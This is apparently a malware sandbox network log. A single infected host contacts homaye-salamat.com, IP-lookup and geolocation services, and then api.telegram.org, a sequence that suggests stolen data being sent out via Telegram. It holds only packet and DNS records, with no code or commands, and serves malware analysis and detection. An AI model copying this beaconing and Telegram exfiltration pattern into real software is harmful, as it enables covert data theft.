                                                                                Mar 12, 2025 19:16:32.795975924 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:32.795990944 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.796041012 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:32.809685946 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.809704065 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.809777975 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:32.809791088 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.809830904 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:32.820637941 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.820657015 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.820772886 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:32.820782900 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.820822001 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:32.843540907 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.843564987 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.843626976 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:32.843637943 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.843667984 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:32.843683004 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:32.854470968 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.854490042 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.854598045 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:32.854617119 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.854708910 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:32.966907978 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.966938972 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.967040062 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:32.967082977 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:32.967103004 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:32.967128038 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:33.103662968 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:33.103691101 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:33.103748083 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:33.103782892 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:33.103797913 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:33.103832006 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:33.109446049 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:33.109469891 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:33.109550953 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:33.109566927 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:33.109611034 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:33.116370916 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:33.116390944 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:33.116465092 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:33.116475105 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:33.116508007 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:33.116559982 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:33.122298956 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:33.122370958 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:33.122386932 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:33.122471094 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:33.131165981 CET51187443192.168.2.9185.10.75.23
                                                                                Mar 12, 2025 19:16:33.131197929 CET44351187185.10.75.23192.168.2.9
                                                                                Mar 12, 2025 19:16:33.995856047 CET5118880192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:34.000806093 CET8051188193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:34.000900030 CET5118880192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:34.001339912 CET5118880192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:34.006014109 CET8051188193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:34.477768898 CET8051188193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:34.482441902 CET5118880192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:34.487154007 CET8051188193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:34.587794065 CET8051188193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:34.645991087 CET5118880192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:35.209902048 CET51189443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:35.209954023 CET44351189104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:35.210068941 CET51189443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:35.212001085 CET51189443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:35.212013006 CET44351189104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:37.002588987 CET44351189104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:37.002964020 CET51189443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:37.007244110 CET51189443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:37.007256985 CET44351189104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:37.007541895 CET44351189104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:37.011656046 CET51189443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:37.052324057 CET44351189104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:37.804790020 CET44351189104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:37.804863930 CET44351189104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:37.804954052 CET51189443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:37.810004950 CET51189443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:37.817002058 CET5118880192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:37.821727037 CET8051188193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:37.963345051 CET8051188193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:37.965971947 CET51190443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:37.966017008 CET44351190104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:37.966123104 CET51190443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:37.966478109 CET51190443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:37.966491938 CET44351190104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:38.145982027 CET5118880192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:39.767786980 CET44351190104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:39.769872904 CET51190443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:39.769898891 CET44351190104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:40.303565979 CET44351190104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:40.303642035 CET44351190104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:40.303755999 CET51190443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:40.304327011 CET51190443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:40.308779955 CET5118880192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:40.310343027 CET5119180192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:40.314033985 CET8051188193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:40.314148903 CET5118880192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:40.315443039 CET8051191193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:40.315551996 CET5119180192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:40.315731049 CET5119180192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:40.321053028 CET8051191193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:40.789926052 CET8051191193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:40.800260067 CET51192443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:40.800322056 CET44351192104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:40.800704002 CET51192443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:40.801124096 CET51192443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:40.801139116 CET44351192104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:40.942889929 CET5119180192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:43.258316994 CET44351192104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:43.260067940 CET51192443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:43.260106087 CET44351192104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:43.969213963 CET44351192104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:43.969295979 CET44351192104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:43.971347094 CET51192443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:43.971347094 CET51192443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:43.976453066 CET5119380192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:43.981156111 CET8051193193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:43.981308937 CET5119380192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:43.981410980 CET5119380192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:43.986105919 CET8051193193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:44.442521095 CET8051193193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:44.508831024 CET51194443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:44.508878946 CET44351194104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:44.508999109 CET51194443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:44.509308100 CET51194443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:44.509336948 CET44351194104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:44.646034956 CET5119380192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:46.414016008 CET44351194104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:46.417268991 CET51194443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:46.417321920 CET44351194104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:46.958494902 CET44351194104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:46.958580017 CET44351194104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:46.958724022 CET51194443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:46.959394932 CET51194443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:47.017995119 CET5119380192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:47.018953085 CET5119580192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:47.023154020 CET8051193193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:47.023251057 CET5119380192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:47.023647070 CET8051195193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:47.023724079 CET5119580192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:47.023869991 CET5119580192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:47.028544903 CET8051195193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:47.478786945 CET8051195193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:47.481256008 CET51196443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:47.481309891 CET44351196104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:47.481389046 CET51196443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:47.481647968 CET51196443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:47.481659889 CET44351196104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:47.521017075 CET5119580192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:49.418701887 CET44351196104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:49.420528889 CET51196443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:49.420567036 CET44351196104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:49.946161032 CET44351196104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:49.946228981 CET44351196104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:49.946294069 CET51196443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:49.946753025 CET51196443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:49.951313972 CET5119580192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:49.952337980 CET5119780192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:49.956129074 CET8051195193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:49.956275940 CET5119580192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:49.957007885 CET8051197193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:49.957073927 CET5119780192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:49.957166910 CET5119780192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:49.961822033 CET8051197193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:50.445465088 CET8051197193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:50.446878910 CET51198443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:50.446918964 CET44351198104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:50.446994066 CET51198443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:50.447251081 CET51198443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:50.447277069 CET44351198104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:50.489764929 CET5119780192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:52.444622993 CET44351198104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:52.446769953 CET51198443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:52.446791887 CET44351198104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:52.972182035 CET44351198104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:52.972263098 CET44351198104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:52.972341061 CET51198443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:52.973490953 CET51198443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:52.981671095 CET5119780192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:52.984025002 CET5119980192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:52.986704111 CET8051197193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:52.986769915 CET5119780192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:52.988826990 CET8051199193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:52.988920927 CET5119980192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:52.988992929 CET5119980192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:52.993685961 CET8051199193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:53.458281994 CET8051199193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:53.459716082 CET51200443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:53.459758997 CET44351200104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:53.459826946 CET51200443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:53.460129976 CET51200443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:53.460145950 CET44351200104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:53.646044970 CET5119980192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:55.270559072 CET44351200104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:55.273389101 CET51200443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:55.273423910 CET44351200104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:55.918354034 CET44351200104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:55.918433905 CET44351200104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:55.918492079 CET51200443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:55.918987036 CET51200443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:55.924751997 CET5119980192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:55.925976038 CET5120180192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:55.929716110 CET8051199193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:55.929765940 CET5119980192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:55.930661917 CET8051201193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:55.930782080 CET5120180192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:55.930902004 CET5120180192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:55.935611010 CET8051201193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:56.404968977 CET8051201193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:56.406547070 CET51202443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:56.406588078 CET44351202104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:56.406697989 CET51202443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:56.407074928 CET51202443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:56.407083988 CET44351202104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:56.458581924 CET5120180192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:58.444749117 CET44351202104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:58.446626902 CET51202443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:58.446644068 CET44351202104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:59.036353111 CET44351202104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:59.038824081 CET44351202104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:59.040328979 CET51202443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:59.040328979 CET51202443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:59.046035051 CET5120180192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:59.047386885 CET5120380192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:59.051214933 CET8051201193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:59.051268101 CET5120180192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:59.052238941 CET8051203193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:59.052324057 CET5120380192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:59.052536964 CET5120380192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:16:59.057301044 CET8051203193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:59.542495012 CET8051203193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:16:59.545089006 CET51204443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:59.545136929 CET44351204104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:59.545208931 CET51204443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:59.545506001 CET51204443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:16:59.545522928 CET44351204104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:16:59.646045923 CET5120380192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:17:01.432785988 CET44351204104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:17:01.437550068 CET51204443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:17:01.437588930 CET44351204104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:17:02.012612104 CET44351204104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:17:02.012692928 CET44351204104.21.112.1192.168.2.9
                                                                                Mar 12, 2025 19:17:02.012753010 CET51204443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:17:02.013211012 CET51204443192.168.2.9104.21.112.1
                                                                                Mar 12, 2025 19:17:02.046700954 CET5120380192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:17:02.051630974 CET8051203193.122.130.0192.168.2.9
                                                                                Mar 12, 2025 19:17:02.051742077 CET5120380192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:17:02.055784941 CET51205443192.168.2.9149.154.167.220
                                                                                Mar 12, 2025 19:17:02.055824041 CET44351205149.154.167.220192.168.2.9
                                                                                Mar 12, 2025 19:17:02.056003094 CET51205443192.168.2.9149.154.167.220
                                                                                Mar 12, 2025 19:17:02.056771040 CET51205443192.168.2.9149.154.167.220
                                                                                Mar 12, 2025 19:17:02.056786060 CET44351205149.154.167.220192.168.2.9
                                                                                Mar 12, 2025 19:17:04.172745943 CET44351205149.154.167.220192.168.2.9
                                                                                Mar 12, 2025 19:17:04.172914982 CET51205443192.168.2.9149.154.167.220
                                                                                Mar 12, 2025 19:17:04.174952030 CET51205443192.168.2.9149.154.167.220
                                                                                Mar 12, 2025 19:17:04.174971104 CET44351205149.154.167.220192.168.2.9
                                                                                Mar 12, 2025 19:17:04.175234079 CET44351205149.154.167.220192.168.2.9
                                                                                Mar 12, 2025 19:17:04.176650047 CET51205443192.168.2.9149.154.167.220
                                                                                Mar 12, 2025 19:17:04.220333099 CET44351205149.154.167.220192.168.2.9
                                                                                Mar 12, 2025 19:17:04.867366076 CET44351205149.154.167.220192.168.2.9
                                                                                Mar 12, 2025 19:17:04.867448092 CET44351205149.154.167.220192.168.2.9
                                                                                Mar 12, 2025 19:17:04.867486000 CET51205443192.168.2.9149.154.167.220
                                                                                Mar 12, 2025 19:17:04.869942904 CET51205443192.168.2.9149.154.167.220
                                                                                Mar 12, 2025 19:17:10.663136005 CET5119180192.168.2.9193.122.130.0
                                                                                Mar 12, 2025 19:17:10.888612986 CET51206443192.168.2.9149.154.167.220
                                                                                Mar 12, 2025 19:17:10.888672113 CET44351206149.154.167.220192.168.2.9
                                                                                Mar 12, 2025 19:17:10.888778925 CET51206443192.168.2.9149.154.167.220
                                                                                Mar 12, 2025 19:17:10.889053106 CET51206443192.168.2.9149.154.167.220
                                                                                Mar 12, 2025 19:17:10.889074087 CET44351206149.154.167.220192.168.2.9
                                                                                Mar 12, 2025 19:17:12.955877066 CET44351206149.154.167.220192.168.2.9
                                                                                Mar 12, 2025 19:17:12.957870007 CET51206443192.168.2.9149.154.167.220
                                                                                Mar 12, 2025 19:17:12.957905054 CET44351206149.154.167.220192.168.2.9
                                                                                Mar 12, 2025 19:17:12.957967043 CET51206443192.168.2.9149.154.167.220
                                                                                Mar 12, 2025 19:17:12.957976103 CET44351206149.154.167.220192.168.2.9
                                                                                Mar 12, 2025 19:17:13.576132059 CET44351206149.154.167.220192.168.2.9
                                                                                Mar 12, 2025 19:17:13.578793049 CET44351206149.154.167.220192.168.2.9
                                                                                Mar 12, 2025 19:17:13.578902006 CET51206443192.168.2.9149.154.167.220
                                                                                Mar 12, 2025 19:17:13.579226971 CET51206443192.168.2.9149.154.167.220
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Mar 12, 2025 19:15:34.505747080 CET5334053192.168.2.91.1.1.1
                                                                                Mar 12, 2025 19:15:34.659579992 CET53533401.1.1.1192.168.2.9
                                                                                Mar 12, 2025 19:15:54.958854914 CET5352750162.159.36.2192.168.2.9
                                                                                Mar 12, 2025 19:15:55.449590921 CET5834853192.168.2.91.1.1.1
                                                                                Mar 12, 2025 19:15:55.456770897 CET53583481.1.1.1192.168.2.9
                                                                                Mar 12, 2025 19:16:28.755335093 CET5267753192.168.2.91.1.1.1
                                                                                Mar 12, 2025 19:16:28.928196907 CET53526771.1.1.1192.168.2.9
                                                                                Mar 12, 2025 19:16:33.982040882 CET6278853192.168.2.91.1.1.1
                                                                                Mar 12, 2025 19:16:33.989494085 CET53627881.1.1.1192.168.2.9
                                                                                Mar 12, 2025 19:16:35.183073044 CET6023553192.168.2.91.1.1.1
                                                                                Mar 12, 2025 19:16:35.199760914 CET53602351.1.1.1192.168.2.9
                                                                                Mar 12, 2025 19:17:02.047374964 CET4990753192.168.2.91.1.1.1
                                                                                Mar 12, 2025 19:17:02.054346085 CET53499071.1.1.1192.168.2.9
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Mar 12, 2025 19:15:34.505747080 CET192.168.2.91.1.1.10xb723Standard query (0)homaye-salamat.comA (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:15:55.449590921 CET192.168.2.91.1.1.10x6be1Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:28.755335093 CET192.168.2.91.1.1.10xa312Standard query (0)homaye-salamat.comA (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:33.982040882 CET192.168.2.91.1.1.10xd7e9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:35.183073044 CET192.168.2.91.1.1.10x351bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:17:02.047374964 CET192.168.2.91.1.1.10x6bc6Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Mar 12, 2025 19:15:20.311971903 CET1.1.1.1192.168.2.90x9b50No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:15:20.311971903 CET1.1.1.1192.168.2.90x9b50No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:15:34.659579992 CET1.1.1.1192.168.2.90xb723No error (0)homaye-salamat.com185.10.75.23A (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:15:55.456770897 CET1.1.1.1192.168.2.90x6be1Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:28.928196907 CET1.1.1.1192.168.2.90xa312No error (0)homaye-salamat.com185.10.75.23A (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:33.989494085 CET1.1.1.1192.168.2.90xd7e9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:33.989494085 CET1.1.1.1192.168.2.90xd7e9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:33.989494085 CET1.1.1.1192.168.2.90xd7e9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:33.989494085 CET1.1.1.1192.168.2.90xd7e9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:33.989494085 CET1.1.1.1192.168.2.90xd7e9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:33.989494085 CET1.1.1.1192.168.2.90xd7e9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:35.199760914 CET1.1.1.1192.168.2.90x351bNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:35.199760914 CET1.1.1.1192.168.2.90x351bNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:35.199760914 CET1.1.1.1192.168.2.90x351bNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
